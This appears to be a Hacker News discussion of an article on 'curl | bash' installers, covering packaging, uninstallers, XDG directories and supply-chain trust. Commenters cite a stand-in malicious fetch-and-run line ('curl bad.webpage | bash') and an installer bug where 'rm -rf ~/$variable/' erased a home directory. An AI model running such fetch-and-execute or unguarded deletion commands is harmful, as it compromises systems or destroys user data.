The Audacity of Piping Curl to Bash
yotam.netThis seems almost like a misunderstanding of what is the role of an installer, especially for something like oh my zsh. The author is complaining that it takes over their zsh configuration, when in fact that is obviously the whole point of the installer.
An installer isn't simply there to copy a program to your system. It's there to copy files to your system and then modify your system so that it is ready to use the new program to the deepest level that makes sense. You're not supposed to need to do any other configuration of your system for this program after the installer finishes in order to properly use it. This includes things like associating file types with this program, changing system settings to make it default in various places (hopefully with some kind of flag, to be fair), discovering and associating hardware or any other step like that.
Note that piping curl to bash or running bash on the output of curl/wget is a minor point quickly glossed over in the article, which is actually complaining much more about using custom installation scripts that do "too much".
The other part of an installer's job is to provide a reliable way to uninstall the program, without leaving any mess behind.
I think that's the main reason I'm reluctant to run curl|bash-ware. I might trust the authors not to be malicious, but I generally wouldn't trust them to be competent at cleaning up after themselves.
Yes, having a proper method for uninstalling is one big advantage of "proper" installers (like .deb packages or .msi installers on Windows) - though of course there is no guarantee even then that it will properly clean-up the system.
However, having a package that simply installs some files and then tells you "copy these lines to your .bashrc and modify this mount file and [...]" to set up your system is really not that much better - if you follow those instructions, it will be up to you to manually un-follow them if you later decide to stop using this package. And while whoever wrote the installer may or may not properly undo what what they installed in the uninstaller, I can guarantee that no one will provide an uninstaller which un-does changes you manually made.
> a reliable way to uninstall the program, without leaving any mess behind
cc: Anyone working on macOS
Uninstalling macOS apps is usually as simple as removing the app bundle.
If only that were true. Apps leave their config and support files all over the file system.
Also true of literally every OS, on the inherited wisdom that separating the config from the actual application allows it to persist through upgrades and reinstalls easily.
There are certainly other ways to do that, but this is how it has been done since forever.
Windows uninstall isn't guaranteed* to be perfect but it's much better in this regard. It's common on Windows to have uninstaller apps that go around cleaning up the crumbs of the application. The equivalent on macOS isn't unheardof but it's rare.
I assure you that the vast majority of Windows software leaves config files and registry entries behind when uninstalled.
A proper uninstaller actually gives even this as an option though
>It's common on Windows to have uninstaller apps that go around cleaning up the crumbs of the application.
In my experience what is common will be the inverse of that. And leaving config files spread throughout the system is one thing. Sometimes the uninstaller doesn't even remove the Program Files directory leaving it behind with cache, tmp files, etc. (Things that shouldn't even be there in first place but anyway.)
Right but few kbs of config is less of a bother than few hundred megs of deps installed all over the place.
The config and data is iffy situation because you might want to uninstall just to install new version, and so might want them to stay, might want them gone.
Precisely, if this is the suggested distribution method then I have to assume there's been even less investment in 'undistribution'
It's possible for installers to be this full-featured, but it's plagued with footguns.
They try and often fail to make an idempotent shellrc patcher with command line pipes, or something equally convoluted. If at all.
Instead of using something established, or even better... drop-in config directories.
Not everything needs to own (or even touch) the main config file!
edit: Don't trust the 'curl the script before piping it' thing, either.
I don't have it handy, but there's been demonstrated means to alter the content based on timing, causing the pipe to be a malicious payload
It's almost admission of guilt, nobody ever thinks about that uninstall.
Even workse if app starts with sudo to install some stuff in system directories
>An installer [... is] there to copy files to your system and then modify your system so that it is ready to use the new program to the deepest level that makes sense
Sure, but what's the corresponding step in the zsh "install"? Looks like copying over their ~/.zshrc. The "install" script could have chosen to clone the git repo, copy the file, then print "all done! run 'zsh' to start your new shell!' or whatever
> If my package manager had an Oh My Zsh package
This is the author missing the point. The reason `curl | bash` is common is because devs don't like packaging for every distro under the sun, and MacOS, and FreeBSD, and... If you really think `curl | bash` is the problem, then you should be lining up to package the stuff you use for your distro. Instead, it is always someone else's problem.
Package managers are great... for the user. For everyone else, a polyglot system, with arcane technical policies, and even more arcane human policies is... not ideal.
The effort to package is precisely what the complaint is about; you have to tell (in package manifest) where your files land and which are app files (to be removed freely) and which are config (user might want to leave it, won't be automatically overwritten on update)
> devs don't like packaging for every distro under the sun
source .deb will generally works fine under Ubuntu, Debian and most flavours just fine unless you have some funky dependencies (and if you do, installer will also be complex)
RHEL/Centos RPM will cover near-whole rest of the market.
MacOS/FreeBSD will be different enough anyway that you will need to write a bunch more in install script
Building simple package that just delivers binary is not even that complicated. Getting them to pass distro muster is often harder but you don't need to do that.
> Package managers are great... for the user. For everyone else, a polyglot system, with arcane technical policies, and even more arcane human policies is... not ideal.
Most of those "arcane" policies are there so random incompetent dev won't fuck up other stuff in the system. Which is also why users want packages in the first place.
And you don't need to abide to any policy to make simple package that just puts your files on the system. Building dumb debian package is just few metadata files (post/preinst scripts + a file describing your package) in a directory and a single command.
You only need to worry about policies if you want to submit package to distro, and there are in place for a reason.
No shit they are better for users, that's their entire fucking point!
> No shit they are better for users, that's their entire fucking point!
I'm not even sure we disagree about anything, and you're yelling? FWIW I package and distribute my software but for a long time I didn't.
My position is very simple -- it's always easier if someone else does the work for you. If someone chooses not to distribute with a package, that's fine. If it bothers you, the choice is to build a package spec and pipeline for that project, not to moan about it. But packages are not an entitlement of a non-paying user. That user is perfectly entitled not to use your software, because complaining about the packages you may or may not have available is stupid, and not the devs problem.
With things like the OpenSUSE build system... I see this more as a one time cost
You write the spec files for the managers of choice; DEB, RPM, PKGBUILD, whatever
With that you parameterize the inputs. The version to build, where to get the sources, etc.
Maintaining these is... note your build/runtime requirements the same way you do while developing.
Once the specs are written the laborious work is finished. There are countless tools to make this less effort, eg: pyp2rpm and alien
I maintain packages through Fedora COPR, a similar system. These tools are my first pass at writing the spec for things I don't even own.
I practice what I'm preaching, and I really don't buy that it's a lot of effort. If you want users, do it.
This is a critical first step to being bundled in the distribution itself. You won't get maintainers if there's nothing to maintain.
Pretty much. I've built a few for the internal stuff and it is essentially one time effort for DEB based platform.
Clowns at Red Hat do like to break manifest compatibility in the worst way tho, think "a macro with same name in new version now does something else". The idea of .spec file being whole manifest is... nice in theory, not in Red Hat execution. But then last time I did any for RHEL was at RH6/7 time, maybe it's better now...
But even in that case that's fixing few minor things every 3-5 years at worst. There is no excuse to not make your packages if you're actual serious developer, not some random hobbyist.
I do give a pass for apps that run as single binary as that while suboptimal is at least easy to work around.
Oh you're right, that surprise macro dance is an absolute pain.
Being on Fedora I run into this a little more regularly than you would on proper RH these days, it's like the prerelease playground.
If you (or anyone) had things building fine for Fedora 36, they may not on 37. I forget which but one of the macros I repeat moved packages
One of these likely translates to a future Red Hat release
> I practice what I'm preaching, and I really don't buy that it's a lot of effort. If you want users, do it.
I've heard a lot about these systems, and, if they do what they promise, I think this is great. Exactly what is needed. I already do package and distribute my software. My comments are mostly directed at those who have a problem with those who don't, because that's a fine choice too. It can also be a fine choice for awhile. The problem is mostly one of attitude, we need less user entitlement re: packages. Packages are something I will get to if I want to, when I have the time, and if it interests me.
I would note there are other problems with the package manager ecosystem which make it ill-suited to packaging Rust apps, for instance. I am not an Arch user, but Arch really is leading the way here: https://wiki.archlinux.org/title/Rust_package_guidelines
Thank you for the packages you do maintain!
I don't want to seem unappreciative for the work developers like yourself and others do; packages or not.
I'm not a developer, but a Linux/systems person who happened to learn packaging. Mostly because I got tired of building from source, and figured others were too.
As a maintainer it is easy for me (and others) to trivialize this, as compared to actually writing the much more complicated software. It's not right, and I think we could all use more understanding.
I see a meme that 'packaging is hard', and while very rigid/plain, it's not actually that tough.
Priority is another matter, I just don't want this notion of difficulty to unfairly sway that priority. Many of the concepts reapply, like languages. The tooling/services have improved a lot
I'm not too familiar with Rust, unfortunately. What would you say makes Arch stand out in particular?
How do you feel about Fedora? https://docs.fedoraproject.org/en-US/packaging-guidelines/Ru...
It's even worse than that. The way common distros work is not "devs package software", it's "devs convince distro to pick up the package and maintain a fork".
Of course, you can run your own APT or RPM repo, but that actually asks your users for even more control of their systems (since you now have a way to get any new version more or less automatically installed on their system in perpetuity), and it makes it even harder for them to install your software.
You can also bundle your software as a .deb + .rpm + .[...] file instead of a .sh file, but there is really not that much difference.
> It's even worse than that. The way common distros work is not "devs package software", it's "devs convince distro to pick up the package and maintain a fork".
> Of course, you can run your own APT or RPM repo, but that actually asks your users for even more control of their systems (since you now have a way to get any new version more or less automatically installed on their system in perpetuity), and it makes it even harder for them to install your software.
Technically incorrect as you can put (at least in apt) filters on what's allowed from the repo
Also, you want to have your cake and eat it too.
Either there is some 3rd party to look at package quality (even if "quality" in this case is "does not fuck up other stuff" and "uninstalls properly"),
or you trust developer to not fuck you over when they update the package
or you don't and only install raw .deb file.
> You can also bundle your software as a .deb + .rpm + .[...] file instead of a .sh file, but there is really not that much difference.
Main difference is that package can require system deps (so you will be sure that they are not removed on accident) and you don't need to write uninstaller for it.
> but that actually asks your users for even more control of their systems
Or you can support one of the limited-capability package ecosystems, like Flatpak or Snap or AppImage. Then it's sort of like installing an app on your Android phone: the installed app (and its updates) only get to interact with the system through a customized sandbox that must first be described to, and accepted by, the user.
Sure, but there is plenty of software for which that doesn't make any sense, since the whole point is to interact with your system. ohmyzsh is a good example, as are most SDKs, as is plenty of specialty software.
SDKs are an interesting case — it wouldn't work to package them into a sandbox by default, but do look at how macOS treats XCode for an example of how something can be "sandboxed" but still reach out into the system by the system instead actually reaching into it. A thin layer of non-sandboxed system components on macOS "expect" XCode, and so work with it if it's available, to extract specific sandboxed data from the XCode sandbox and so "publish" it into being standalone software (rather than software that ends up also running inside the XCode sandbox.)
Essentially, an SDK in this sense would be a sandboxed plugin for a non-sandboxed system-level meta-SDK manager, that knows how to use these SDKs (in their sandboxes!) to compile and/or test-run things; where a test-run gets granted capabilities that the SDK-as-compiler does not itself possess, per a capabilities manifest fed in with the meta-SDK development project.
AppImage is not "limited-capability" and has no sandbox mechanism at all without additional tools. An AppImage is the rough equivalent of a statically compiled binary.
> devs don't like packaging for every distro under the sun, and MacOS, and FreeBSD, and... If you really think `curl | bash` is the problem, then you should be lining up to package the stuff you use for your distro
I mean, no, those aren't the only two solutions. As with accessibility requirements for public-access shops, "we the users" could mandate (either through legislation, or more interestingly, through some kind of medical/legal-like software-engineering bar association) that devs either properly package their apps, or don't release them at all.
I'm not saying it's a good idea; just saying that it's probably the solution brewing in the back of the minds of people who write things like this.
> devs either properly package their apps, or don't release them at all.
There's still no widely accepted answer for what 'properly package their apps' looks like. You could want snaps or appimages or a flatpak, or rpms or debs or docker containers or nix flakes or cargo crates or python virtual environments or jars or javawebstarts or portable windows executables or windows msis or webasm packages or web pages ... there's an impossible profusion that it's currently unreasonable to expect devs (many of whom are working for free) to support more than a couple of.
If there were a single solution that worked in almost all cases and platforms, didn't put unreasonable constraints on packagers and was widely adopted, then it might be somewhat reasonable to expect devs to support it, but that's far from the world we live in. The closest to that (despite its real problems) is probably piping a curl to a bash script...
>There's still no widely accepted answer for what 'properly package their apps' looks like. You could want snaps or appimages or a flatpak, or rpms or debs or docker containers or nix flakes or cargo crates or python virtual environments or jars or javawebstarts or portable windows executables or windows msis or webasm packages or web pages ...
Any single one of them is better than curl|sh. Just pick one. Even shipping raw runnable binary blob is preferred.
But to classify, as long as it is a unit managed by a system that can be wholly removed (sans data/configs, as you might want to keep those), it works well enough as "package">
> there's an impossible profusion that it's currently unreasonable to expect devs (many of whom are working for free) to support more than a couple of.
...I don't think I ever saw anyone asking to support more than one for a platform. Obviously users on MacOS (assuming app even releases there) will complain if you only have .deb packages but you won't get many "oh, only .deb ? I wanted a flatpack!"
> I don't think I ever saw anyone asking to support more than one for a platform
What do you mean by platform? If you only ship a .deb, there are going to be a lot of linux and unix users who simply can't use your stuff.
I've seen quite a few tools use curl to bash to work in macOS, windows and multiple flavours of unix. There aren't a huge number of other approaches that can allow that.
I mean, that will just result in no software ever getting made outside of big companies who can afford entire departments of people specializing in packaging.
If someone were to impose restrictions to the hobby things I do, then those hobby things will just become private repositories that will never see the light of day, and I'm sure that rings true for most people.
> "we the users" could mandate
Yuck. As I said:
> Instead, it is always someone else's problem.
"I am the customer mentality" has been with FOSS and Linux for awhile, but one wishes people might shake themselves out of their stupor for 2 seconds to realize: "You're getting all this stuff for free." Instead, every user wants to man the battlements on Reddit and tell devs how to do the thing.
Re: the parent, she/he shouldn't be downvoted for making an unpopular yet interesting point.
> "You're getting all this stuff for free."
Of course.
Part of packaging something, and then releasing it through a distro's package manager, is that it goes through the distro's release process; someone reviews it. It becomes part of the distro. In particular, if it goes into something like Debian's "main" repository, I'm inclined to trust it almost as much as I trust the core OS release.
I'm not going to man battlements anywhere over this kind of thing; but I'm not going to execute arbitrary shell scripts downloaded from the internet without reviewing them; and 600 lines of shell-script is more than I want to review, unless I'm super-motivated. If the only way of installing a package is Docker (which I don't care for) or wildcat script, and that package has no maintainer for my chosen distro; that's fine, and I'm not going to beat up the developer. It's not his fault, nor his responsibility.
So instead I generally look for an alternative package that's shipped by my distro. I don't keep a record of all the wildcat software installed on my systems, because there usually isn't any, and my package manager knows exactly what's installed.
> I'm not going to man battlements anywhere over this kind of thing
Totally agree. A preference is fine. A demand that devs do something different with their limited time and resources is nonsense. Making the choice not to package and distribute is fine. Then -- it just becomes someone else's problem. You hate omz's update method? Then be prepared to package it yourself. That's all I'm saying.
Yet somehow as a developer I have no problem at all realising that it is user-hostile to take liberties with their system.
It's violating trust and I have no need to do it in order to provide, even to install, a piece of software.
> It's violating trust
`curl | bash` is pretty upfront about what it is. It would seem the user is the one taking liberties, but perhaps I'm missing your point?
Even if omz had a package-managed package, it would do the basic curl|bash itself the moment it was installed, to update itself. Technically it's git and things, but that's all the curl|bash does anyway.
> I would have just expected it to install it in the proper location (hopefully not in my home directory) and leave the rest of the configuration to me
While I don't advocate for piping curl to bash, this is exactly what I expect an installer to do. It should provide sane defaults that don't require me to fiddle around with manpages or other documentation and config files before I can even use the thing. I'd say that's even the standard for most software. Now, I might compromise on the installer telling me what command I need to enter to get a default configuration/setup integrated instead of doing it automatically, but I have too much shit to do to waste it on configuring the nth thing I've installed this week.
I think what's missing is some standardization around what an installer is allowed to do and flags to tell it when to make certain changes as well as explicit logging for what exactly was changed or added where, but that's not going to be solved if everybody has their own bespoke bash script for installation.
> I think what's missing is some standardization around what an installer is allowed to do
I don't mean to be facetious, genuinely curios, but to the authors point, isn't that the point of the package management system? It's a standardized and encapsulated way to provide software, with sane defaults, in an auditable way, that respects the users system.
I tend to agree with the author here, but I'm sympathetic to the maintainer: packaging for rpm/deb (in my experience) can sometimes be an enormous pain with many hoops to jump through, _especially_ if you're trying to get your package accepted upstream. With that said, it is a mature, standardized process, and is fairly painless in the self-hosted/non-upstreamed case.
> packaging for rpm/deb (in my experience) can sometimes be an enormous pain with many hoops to jump through, _especially_ if you're trying to get your package accepted upstream
I would say this is the primary pain point for maintainers, which is why we're suddenly seeing bash scripts instead. The technical complexity and the process of upstreaming and then doing this for a bunch of different distros. If they're already rejecting package management systems because of their current state, the solution isn't "well, why don't they just use existing package management systems".
> the solution isn't "well, why don't they just use existing package management systems"
Fair enough, I think I was more trying to unwrap the idea of "shell script standardization", which to me feels like a package management system.
To your point about the challenges of packaging for multiple distros, there are force multiplying tools I've used in the past that make this easier, but in my experience it is always a big challenge.
My hope is that things like Nix or even something like brew can help to further consolidate the installation process for software going forward, so that everyone can have the best of all worlds :D
> Fair enough, I think I was more trying to unwrap the idea of "shell script standardization", which to me feels like a package management system.
And you're right, of course. I just think it's important to recognize what is being compensated for when existing solutions are rejected. We have a habit of saying "they shouldn't be doing that, we have this already" instead of "this is a signal that something in the environment is making what they're doing a viable alternative, how can we improve things?"
I don't think it's an accident that we're seeing the rise of Snap and flatpak or even Nix at the same time.
> I don't think it's an accident that we're seeing the rise of Snap and flatpak or even Nix at the same time.
It's not because making packages is hard, it's because making sure you bring your app dependencies with you is.
It is generally a problem for languages that are not self contained (like Go, Java) but need a bunch of .so libs to run.
Distro's attitude is pretty much "we want X version of lib, we will support that version and focus all patches on this version for this release". It works, it keeps things stable (you know exactly what you need to target with your app), security update of a library hits every app using that library but it is PITA if
* your app needs something newer for features
* lib your app uses is not in distro already, then you need to either embed it with main package or package that too.
* your developers can't even figure out which version is enough so they just pull whatever is on their desktop as "production" dependency".
All the effort there is in making sure devs that can't figure that out at least use same base (docker's FROM being one example) and that they don't have to package all the other stuff that app needs in separate packages (docker/flatpack/appimage),
"Fat" packages like that obviously have some benefits, but, well, in distro I can upgrade OpenSSL and now every app is safe, in flatpack/appimage/docker-ridden environment every single of fat packages need their maintainer to care enough to upgrade so generally while easier on dev effort they are security disaster waiting to happen.
The person you cited is either lying by omission or don't have a clue.
Getting package up to distro standard and have it included in distro can be complex
Making a package ? Nope. Make a dir tree
make a control file./DEBIAN/control ./usr/bin/yourapp
run one commandPackage: my-tools Version: 0.0.1 Section: base Priority: optional Architecture: all Maintainer: Someone <some@email> Depends: etckeeper (>= 0.40), git-core, iotop, iftop, links, mc, multitail, mtr-tiny, nmap, psmisc, screen, tcpdump, curl, socat Recommends: swaks, atop, ntpdate Suggests: hping3 Conflicts: vim Description: Some random tools tools i use for everyday work
and you sir are fucking DONE.fakeroot dpkg-deb -b my-toolswant postinst script ? shove it in ./DEBIAN/postinst
want to tell package manager "those are configs, don't replace them on upgrade" ? Put a list of them in ./DEBIAN/conffiles
in case of RPM all of that info is even in single file (altho bit more fuckery IIRC) but if you are lazy you can just make deb package and convert it to RPM
Making simple package is EXTREMELY simple. Checks ran by distro are not but they need to make sure your package doesn't leave crap or break anything else so IMO that's understandable, you can just host somewhere else if you don't agree with distro policies.
I don't think I implied making a package wasn't simple...from my comment:
> With that said, it is a mature, standardized process, and is fairly painless in the self-hosted/non-upstreamed case
There is no way a monolithic bash script full of if statements and list of dependencies for every single possible linux or bsd distribution is more maintainable than having a clean set of RPM spec, APT control, AUR PKGBUILD and BSD packages makefiles.
Devs who use curl | bash do that because they are control freaks and want and love to make mess in user's homedirs, that is all. This is a an ego issue, not a technical one.
>I think what's missing is some standardization around what an installer is allowed to do and flags to tell it when to make certain changes as well as explicit logging for what exactly was changed or added where, but that's not going to be solved if everybody has their own bespoke bash script for installation.
YOU ARE RIGHT!
What's more, we can make common installer code so everyone could just use same rules and documentation to customize it to their liking.
And once we have many apps using it might even be integrated into system so you don't have to download as much, and all the bugfixes are in one place so we don't have thousand different install scripts
Once we have that we can just make a very simple data file format, say just a data.tar.gz for data and control.tar.gz for telling installer what to do. As for metadata, just write simple file, say
If you need to run something after installer just put it in control.tar.gz as postinst script and it will do thatPackage: my-tools Version: 0.0.1 Section: base Priority: optional Architecture: all Maintainer: Someuser <some@email>And if that's one format, we can it manage uninstalls too! Just put a simple text database of those files.
OH WAIT THAT'S A FUCKING DEBIAN PACKAGE MANAGER
You could've at least looked at the replies to my comment before ranting pointlessly.
curl ... | bash
is the moral equivalent of {npm, pip, nuget, ...} install
and i really don't understand the folderol around that. In both cases, you can alter the command slightly to instead download the payload without executing it and inspect it first, if you wish. In both cases, you're ultimately going to either audit and then execute or just execute code from Somewhere Else.This is true for distro package managers too, though you could argue that sometimes but not always (ppas, community/, whatever) a distro package manager is an extra layer of insulation between you and nasty stuff.
This is kind of my take on it. As gross as I find pipe-to-shell installers to be instinctually, I can't really think of any objections I have about them which don't apply to just grabbing a package from MacPorts, save for one: MacPorts gives me a unified interface for listing and uninstalling that software after it's installed that I don't get from ad hoc installers. But in terms of the common complaints like security, it's pretty much the same - it's not like I'm auditing the source or patches of all the software I'm installing via MacPorts either.
If curl dies early, bash might be executing a truncated script. Arbitrarily truncated bash scripts are often valid bash scripts that do things you don't want.
You can trivially sidestep this with a main shell function called at the end of your script. https://github.com/terrastruct/d2/blob/729b12685af79bbdaf4b3...
Kinda! The author of the script can trivially avoid the problem. The person pasting "curl ... | bash" into their terminal needs to rely on them having done so, which (last I looked) they too often haven't.
Another downside of these scripts is that they tend to make changes to your user or machine configuration, something which is tolerated from Windows installers but a big no-no for me. E.g. I believe Cargo edits .profile to add its path and Teams makes itself start at login (!).
For reasons such as these, but also things like telemetry configuration defaults and clean uninstalling, I prefer using a package manager. In a way independent package maintainers balance out the power of upstream developers over end users. They embody “you can just change it if you don’t like it” for the regular user.
Cargo does not. Rustup’s installer does, by default. It informs you of this before it does so, and you can ask it to not if you’d prefer.
Thanks for clarifying - it’s been a while!
Any time :) I’m the end your main post is right, just the details are a bit different.
Agree with author. For me, in addition to separating the "download script" and "run it" steps, there is also a "read script to figure out just what the heck it is going to do to my system", with optional "edit script to remove silly things" and "just manually run the three important commands" steps.
Unfortunately, there just isn't a way to square the circle of "this has to work for everybody" and " this shouldn't take 300 lines to ensure a directory exists".
I post this every time this topic comes up.
Piping from the internet into your shell is a bad idea.
https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-b...
I used to think that.
But is it really that much worse than `pip install` random stuff? Or Homebrew, or Linux package managers - it's not like these things get audited.
> it's not like these things get audited.
APT is part of the core Debian distro. I don't know about "audited", but it's tested, and it's maintained. And the packages in "main" are also tested.
I don't program in Python, and I don't know how Pip packages are audited. An awful lot of the packages in Debian main are Python and Ruby libraries, and I suspect that they are rarely used: I assume most Python and Ruby users rely on their own language-specific package manager.
I also regret the arrival of distro-agnostic package managers like Flatpak. But that's fine; I understand why developers use them, and I'm not going to rag on them for that decision. I'm just much less likely to install them.
My point is, how hard it is for a malicious actor to slip something bad into a "high quality" resource such as APT (or any other method safer than curl|bash). I suspect not that hard.
For Python there has certainly been typo-squatting with malicious packages. Notoriously, something like this happened for node (IIRC, not a JS dev). I can well imagine the general code hygiene for Debian is higher, but unless someone really checks and reads the pyramid of requirements, I think safety is maybe illusorily higher than curl|bash. At the end of the day, I have to trust that whoever is providing the code isn't trying to hack me.
For example, to just install Jupyter Notebook (standard Python thing) installs 72 dependencies (I just checked). Do Debian devs check each and every one of them? From memory, Jupyter is available as an APT package.
Or if someone shares an interesting project on HN and points to a GitHub repo, do I read through every line of code? I'll probably skim through any code before running it. But shelling out to a malicious command (like `curl bad.webpage | bash`:) ) is literally one line and easy to hide.
So yes, if I have some malware that requires literally hundreds of dodgy-looking code, it's easier to slip into a curl|bash. But one little line of evil? Not sure it's easier.
> Do Debian devs check each and every one of them?
Well, if Jupyter Notebook is in main, then the libraries it depends on also have to be in main. That means they have Debian maintainers, and have to go through Debian release management. So yes: in theory, the entire stack is checked.
Not by Debian "devs" - I think those are the guys that work on Debian native software, like the installer and dpkg. The checking is done by Debian maintainers and the release managers. And the users, of course; I'm ever grateful to the users who install Sid, and report back to the maintainers.
Most software which doesn't just curl|bash tells you to add their custom repo to APT/YUM/APK/whatever. Very few packages actually rely on the Debian maintainers to add them to the core package repos as a way of being distributed, and even fewer want to use Debian's glacial pace of releasing updates.
Well, I avoid custom repos; I used to have a couple installed on one system a few years ago, but evidently I'm not using "most software".
You're right about Debian, that it moves at a glacial pace. For some of us, that's a benefit. Debian (main) is noted for its stability, and people running services that already work fine, prize stability over new features.
FWIW I switched to Devuan on most machines. I think Debian was over-hasty in jumping on the bandwagon. But Devuan rides on Debian's coattails; I still rely completely on Debian's policies and release processes. I consider myself a Debian user.
Yes it is really that much worse. Homebrew in particular has always been a terrible example itself. Yes a linux package manager is entirely different.
It's not any worse. The exceptions are the official repos for some of the major distros that have lots of active maintainers and eyeballs looking at and testing this stuff.
You didn't read the article, I'm 99% sure.
I read all of it. Should have bet on your odds.
That is kind of nonsense. If someone already has hacked or MITM'd the server offering the install script payload the game is already up. No attacker is going to bother doing that, since the number of people who read the install script before sending it off to bash is minimal.
And every time you post it, a bunch of people point out that there is nothing going on here which package managers or installation executables can't also do.
> For the love of god, why do I still have programs on Linux that don’t use xdg directories?
Because a lot of devs have never heard of it? I'm a linux app dev of <10 years and I've never heard of xdg until this post. I just assumed dotfiles in the home directory were still the de facto standard...
They are. XDG is one of those grand ideas that a few developers really wished everyone else did... but it isn't actually that important so most of the world doesn't bother or never even hears about it.
Not just applications. Entire programming languages like Rust depend on this to install the compiler (rustup, since rustc changes too fast for anything but the most rolling of distros to keep up).
> Entire programming languages like Rust depend on this to install the compiler
And it works! For people who have to stay on top of language changes (not everyone), who are on a wonky platform or that doesn't update quickly enough, this is actually a pretty okay method. And they do also offer alternative methods: https://rust-lang.github.io/rustup/installation/other.html
Here, the "You know what they should be doing..." attitude surely doesn't account for something.
> rustc changes too fast for anything but the most rolling of distros to keep up
This may have once been true, but isn't really anymore. Ubuntu updates all distros with the latest and greatest and does so about every couple of minor version releases (last was 1.59 to 1.61). This is fine for me. My MSRV is now whatever Ubuntu is shipping.
>For people who have to stay on top of language changes (not everyone)
Or anyone that wants to try out the latest "$something but in rust" and tries to compile it.
>who are on a wonky platform or that doesn't update quickly enough,
ie, the vast majority of people so I question the word "wonky" here.
>This may have once been true, but isn't really anymore.
It's still true in my experience. But then again, Rust does change really fast. Maybe they fixed their entire bleeding edge demographic in the last couple weeks and now people refrain from using $latest features that don't work in rustc from 3 months ago.
> Or anyone that wants to try out the latest "$something but in rust" and tries to compile it.
This is kinda true. I think a smallish demo re: who usually downloads a compiler, but it happens. I had a very sophisticated user/dev file a bug about how my software wouldn't compile. Turns out re: compiling from source they downloaded an old version of rustc from their distro's repos, instead of following my instructions, and my new sources wouldn't compile.
Now this was user error. But it happens. Just re this compiler error it was a good change and an easy fix. I stick to a MSRV now.
> ie, the vast majority of people so I question the word "wonky" here.
The vast majority of people aren't downloading compilers.
> Maybe they fixed their entire bleeding edge demographic in the last couple weeks and now people refrain from using $latest features that don't work in rustc from 3 months ago.
Price of using a non-dead language I'm afraid? You and I don't have to worry about the current patois of Latin or ancient Greek either? Remember -- the problem is I create something new, which compiles with a newer version of the compiler, you download the sources and compile, and you get an error because you have an older version of the compiler. This happens in every ecosystem, whether its C, Python or Rust.
If you're argument to me/the kids is: It should be old and nothing should ever change, I'm not sure that's a winner.
> It should be old and nothing should ever change
Bash gets new features, forwards incompatible features, fairly regularly still. It changes almost as much as Rust. But guess what? Bash devs don't expect that it's only other Bash devs using the latest bleeding edge version from last month. They, in general, write code that will work anywhere any time.
Rust code could be written in this way. But it it isn't because of the type of demographic that current writes in Rust. I have confidence this will change over the next decade. But right now, fast forwards incompatible changes combined with fast forwards incompatible devs makes for a very limited lifespan of any rustc. And that leads to the vast majority of the documentation suggesting curl | sh. You don't get that with other languages.
I'm not arguing for no change ever. That's silly. I'm arguing for not writing for the bleeding edge just because you can.
It's one way out of several to install rust. And interestingly enough, my distro maintains a more up to date rust than I do myself.
My issue with piping curl to bash is that so many of these installers are pure junk.
Case in point: I work in web hosting. Yesterday a customer came to me asking for root access to the node so they could run an installer for something. No. But they had already tried running it as their user. And everything in their user account was gone. Why?
Because the installer expected to run as root, and its variables couldn't be defined properly and so when it went to clean up after itself, it did
rm -rf ~/$variable/
and since the variable was unassigned, that became rm -rf ~/
I might not have it exactly right, but that's what the effect was. Piping curl to bash is asking a lot of somebody who doesn't know what they're doing, and should raise the hackles of somebody who does. At the very least, download and view the script yourself before running it.> why do I still have programs on Linux that don’t use xdg directories?
Because there are Linux developers who never heard of XDG and just put their stuff wherever. And since ignoring XDG doesn't makes your application completely unusable, they have pretty much zero incentive to learn about it. Crazy world, isn't it?
XDG is a specification of Free Desktop, a body that I don't trust. Standardizing filesystem locations can't be a bad thing; but an awful lot of it is tied into the requirements of GNOME Desktop, a project which seems to be trying to rule the world, and which I don't want to help with.
Perhaps if XDG were cut loose from the Free Desktop project, more developers and maintainers would pay more attention to it.
That's one reason. Another reason is that while some effort was spent on writing this spec, apparently (?) almost no effort was spent on promoting/enforcing it: there is another top-level comment in this thread from a 10-year Linux application developer that says they've learned about XDG from this very post.
And indeed, there are lots of tremendously popular apps out there (Slack, for instance) that use e.g. $HOME/Downloads as a default download directory instead of $(xdg-user-dir DOWNLOAD), and most users don't mind.
Because '$HOME/Downloads' is the default for `xdg-user-dir DOWNLOAD` and most users never change it.
Only in English locales. Although yes, most users are in that locale.
Quite a few applications do this.
For something like the mentioned oh-my-zsh, it can be safely assumed the user is not a novice in most cases. Having to install in this manner may in fact deter the user, as they'd be suspicious. A well written README would be the better route.
Not always. Lots of programs that do this might be targeted for intermediate users. Brew is the first thing that comes to mind.
I seem to recall a case of a certain application that uses curl to bash to install docker, docker-compose and finally create its containers. The problem lies with the fact that said script committed the mistakes of trying to pull docker from Docker repositories instead of using the one from the distro and also thinking $distro_based_on_ubuntu (I think it was Mint) is Ubuntu. A mess was made and I had to help some guy to fix it.
I don't remember all of the times I've encountered it but a couple of examples I remember are rustup with its 700 lines of shell script (although you can install rust normally of course) and pi hole with its whopping 2700 lines of shell script.
> rustup with its 700 lines of shell script
I wouldn't trust a shipping shell script with less than 200 lines just re: sanity checks.
Large shell script programming stinks. The person who wrote it probably swore off shell as soon as they were done. But it is portable and it isn't half the pain that packaging for several distros is.
When I want to be careful about running these setup scripts, especially just for trying out new software, I run them in a docker container to limit whatever damage the scripts can cause. When the script is complicated, I tend to use docker instead of trying to understand the script and then run it on the 'real' system.
Then when I really like the software and want to install it on the 'real' system, if there's much benefit in doing so, I spend more time and effort understanding the script. More often than not, I end up not doing this because there is no compelling need to install the software on the 'real' system.
Really, the risk here is that the install is going to do something unfortunate, like delete everything in your filesystem because you have a space in your home directory name or cause problems because your .profile didn't end with a CR and it blindly appended it's own stuff to it.
I'm not sure how package managers prevent this sort of issue, but in general running shell scripts as root (and it probably needs to run as root) is a bad thing.
Some package managers don’t really prevent this, particularly thinking of npm but also apt and other system package managers, because they can run arbitrary post-install scripts.
As always, you need to trust the vendor of software you install and/or do an audit of the source/installer regardless.
The title and the content don't match. The omzsh installer behavior is orthogonal to piping it from curl to bash.
On the other hand, It's often the case that your machine is running scripts that have been fetched online via apt and the like and it's definitely something to consider especially with all the hacks that have been happening in the last few years and the undisclosed vulnerabilities available in the wild.
Reading all the comments not understaning the problem is a great way to feel old. It's definitely a new generation, only in the bad way where instead of meaning new energy, imagination, and progrrss, it just means forgot or never learned important concepts and principles.
You do not take liberties with someone else's system, there is no need to do it and no excuse for it. You can have a reference example "make install" in your build system that serves as a reference for the packagers without you having to worry about all the 80 different distros. And it better also have a "make uninstall".
Respecting the possibility that a config file or even the bins and libs might already exist as part of the "make install", are just part of the job like writing the software itself, not some unreasonable extra burden.
